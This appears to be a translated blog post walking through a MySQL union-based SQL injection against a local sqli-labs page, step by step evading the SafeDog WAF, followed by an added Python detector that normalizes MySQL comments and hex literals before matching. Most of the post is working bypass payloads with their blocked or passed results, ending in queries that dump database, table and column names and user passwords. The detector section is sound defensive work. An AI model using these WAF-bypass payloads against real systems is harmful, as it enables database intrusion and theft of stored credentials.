MySQL union injection: bypassing the SafeDog (安全狗) WAF

http://192.168.1.131/Less-1/index.php?id=1 numeric injection
First, check whether an injection point exists.
Scientific notation is used here: crude, but quick.
http://192.168.1.131/Less-1/index.php?id=1e0 unchanged
http://192.168.1.131/Less-1/index.php?id=1e9 error
Next, determine the column count with ORDER BY:
http://192.168.1.131/Less-1/index.php?id=1 order by 1 blocked
http://192.168.1.131/Less-1/index.php?id=1 order /*!by*/ 1 not blocked
Result: 3 columns.
Move on to building the UNION query:
http://192.168.1.131/Less-1/index.php?id=1e9 union select 1,2,3 blocked
Trick: the scientific-notation number can be written directly against union, with no space between them.
http://192.168.1.131/Less-1/index.php?id=1e9union select 1,2,3 blocked
Find the spot where fuzzing can yield a bypass:
http://192.168.1.131/Less-1/index.php?id=1e9union select 1,2,3 blocked
http://192.168.1.131/Less-1/index.php?id=1e9uxnion select 1,2,3 not blocked
http://192.168.1.131/Less-1/index.php?id=1e9unionx select 1,2,3 not blocked
http://192.168.1.131/Less-1/index.php?id=1e9union xselect 1,2,3 not blocked
http://192.168.1.131/Less-1/index.php?id=1e9union sexlect 1,2,3 not blocked
http://192.168.1.131/Less-1/index.php?id=1e9union selectx 1,2,3 blocked
The ones not blocked:
http://192.168.1.131/Less-1/index.php?id=1e9uxnion select 1,2,3 not blocked
http://192.168.1.131/Less-1/index.php?id=1e9unionx select 1,2,3 not blocked
http://192.168.1.131/Less-1/index.php?id=1e9union xselect 1,2,3 not blocked
http://192.168.1.131/Less-1/index.php?id=1e9union sexlect 1,2,3 not blocked
Since we cannot insert anything into the keywords select and union themselves, the only place left to fuzz is between them:
http://192.168.1.131/Less-1/index.php?id=1e9union[fuzz]select 1,2,3
That [fuzz] slot is where we work from now on.
Try the usual bypasses first: /**/ /*!*/ %0d%0a %23%0a
http://192.168.1.131/Less-1/index.php?id=1e9union/**/select 1,2,3 blocked
http://192.168.1.131/Less-1/index.php?id=1e9union/*!%0d%0a*/select 1,2,3 blocked
http://192.168.1.131/Less-1/index.php?id=1e9union/*!*/%0d%0a/**/select 1,2,3 blocked
http://192.168.1.131/Less-1/index.php?id=1e9union/*!*/%0d%0aselect/**/1,2,3 blocked
http://192.168.1.131/Less-1/index.php?id=1e9union/*!*/%0d%0a/*!50000select*//**/1,2,3 blocked
http://192.168.1.131/Less-1/index.php?id=1e9union/*!%23%0a*//*!50000select*//**/1,2,3 blocked
Make it a bit more complex:
http://192.168.1.131/Less-1/index.php?id=1e9union/*!%23%0a/*!50000select*/1,2,3 blocked
Add some symbol noise:
http://192.168.1.131/Less-1/index.php?id=1e9union/*!%23!@@@@!!!%0a/*!50000select*/1,2,3 blocked
http://192.168.1.131/Less-1/index.php?id=1e9union/*!-- -%23!@x\\\\\x@@@xx!!xx!%0a/*!50000select*/1,2,3 bypassed
Now simplify by removing the characters that do nothing.
Minimal form: http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect 1,2,3
The key fragment is: -- -x%0a
Continue the injection:
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect 1,database(),3 blocked
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect 1,database/*!*/(),3 blocked
Fuzz:
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect1,database/*!*/(),3 blocked
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselectx1,database/*!*/(),3 not blocked
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect[fuzz]1,database/*!*/(),3
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect~1,database/*!*/(),3 not blocked
Dump the database names:
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect~1,group_concat(SCHEMA_NAME),3 from information_schema.SCHEMATA not blocked
Dump the table names:
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect~1,group_concat(table_NAME),3 from information_schema.tables where table_schema='security' not blocked
Dump the column names:
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect~1,group_concat(column_NAME),3 from information_schema.columns where TABLE_NAME = 'users' and TABLE_SCHEMA = 'Security' blocked
Think about it: is the single quote being blocked? If so, why was the table-name query not blocked? Or is it a keyword, such as TABLE_NAME or and?
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect~1,group_concat(column_NAME),3 from information_schema.columns where TABLE_NAME = 'users' anxd TABLE_SCHEMA = 'Security' error
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect~1,group_concat(column_NAME),3 from information_schema.columns where TABLE_NAME = 'users' && TABLE_SCHEMA = 'Security' blocked
The single quote is probably what gets blocked, so try hex encoding the strings:
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect~1,group_concat(column_NAME),3 from information_schema.columns where TABLE_NAME =0x7573657273 && TABLE_SCHEMA =0x5365637572697479 not blocked
Finally, query the row contents:
http://192.168.1.131/Less-1/index.php?id=1e9union-- -x%0aselect~1,concat(0x7e,username,0x7e,password,0x7e),3 from users not blocked
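The walkthrough above shows a signature engine matching raw bytes while MySQL reads comments, 1e9union and 0x literals differently. The following is an added example, not code from the post or from SafeDog: a detector that first rewrites the id= value the way MySQL's lexer reads it (URL-decode, apply the '-- ', '#', '/* */' and '/*!NNNNN */' comment rules, split 1e9union into tokens, decode 0x strings) and only then looks for union ... select. Function names and the SAMPLES table are mine; the sample values are the id= fragments from the post.

```python
import re
from urllib.parse import unquote
# MySQL comment rules: '-- ' and '#' run to end of line, '/* */' is dropped,
# the body of '/*!NNNNN ... */' is executed, and comments never nest.
def strip_comments(sql: str) -> str:
    out, i, n = [], 0, len(sql)
    while i < n:
        two = sql[i:i + 2]
        if sql[i] == "#" or (two == "--" and sql[i + 2:i + 3] in (" ", "\t", "\r", "\n")):
            j = sql.find("\n", i); i = n if j < 0 else j + 1   # line comment
        elif sql.startswith("/*!", i):                          # keep version-comment body
            i += 3 + (5 if re.match(r"\d{5}", sql[i + 3:]) else 0)
        elif two == "/*":                                       # drop ordinary comment
            j = sql.find("*/", i + 2); i = n if j < 0 else j + 2
        elif two == "*/":                                       # end of version comment
            i += 2
        else:
            out.append(sql[i]); i += 1; continue
        out.append(" ")
    return "".join(out)
# Hex literal, number (incl. 1e9), identifier, quoted string, or one symbol.
TOKEN = re.compile(r"0x[0-9a-fA-F]+|\d+(?:\.\d*)?(?:[eE][+-]?\d+)?|[A-Za-z_]\w*|'[^']*'|\S")
def canonical_tokens(param: str) -> list:
    # URL-decode, strip comments, tokenize as the lexer would, decode 0x strings.
    toks = []
    for t in TOKEN.findall(strip_comments(unquote(param))):
        if t[:2] == "0x" and len(t) % 2 == 0:                   # 0x7573657273 -> 'users'
            t = "'" + bytes.fromhex(t[2:]).decode("latin-1") + "'"
        toks.append(t.lower())
    return toks

def is_union_select(param: str) -> bool:
    # Match 'union [all|distinct] select' on canonical tokens, not on raw bytes.
    toks = canonical_tokens(param)
    for i, t in enumerate(toks):
        if t == "union":
            nxt = [x for x in toks[i + 1:i + 3] if x not in ("all", "distinct")]
            if nxt[:1] == ["select"]:
                return True
    return False

SAMPLES = {  # constructed: id= values from the post; the last two got past the WAF there
    "1e9 union select 1,2,3": True,
    "1e9union/**/select 1,2,3": True,
    "1e9uxnion select 1,2,3": False,
    "1e9union-- -x%0aselect~1,database/*!*/(),3": True,
    "1e9union-- -x%0aselect~1,3 from t where TABLE_NAME =0x7573657273": True,
}
def check_samples() -> dict:
    return {p: is_union_select(p) for p in SAMPLES}
```

Running `" ".join(canonical_tokens(p))` on the bypass payload prints the same `1e9 union select ~ 1 , database ( ) , 3` stream as the plain payload, which is the form a signature should be matched against.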
Posted by zpchcbd